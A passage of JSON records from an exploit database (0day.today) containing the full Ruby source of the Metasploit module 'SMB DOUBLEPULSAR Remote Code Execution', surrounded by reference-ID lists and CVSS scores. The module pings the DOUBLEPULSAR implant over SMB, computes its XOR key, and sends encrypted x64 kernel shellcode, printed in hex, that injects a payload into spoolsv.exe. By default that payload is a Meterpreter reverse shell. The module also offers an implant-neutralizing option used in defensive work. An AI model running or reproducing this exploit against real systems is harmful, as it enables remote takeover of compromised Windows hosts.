"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-04T22:15:58", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-04T22:15:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-05] #"}, "lastseen": "2021-09-04T22:15:58", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "35c5b071c29de8d95160be1aaf06b334", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-05T22:11:00", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", 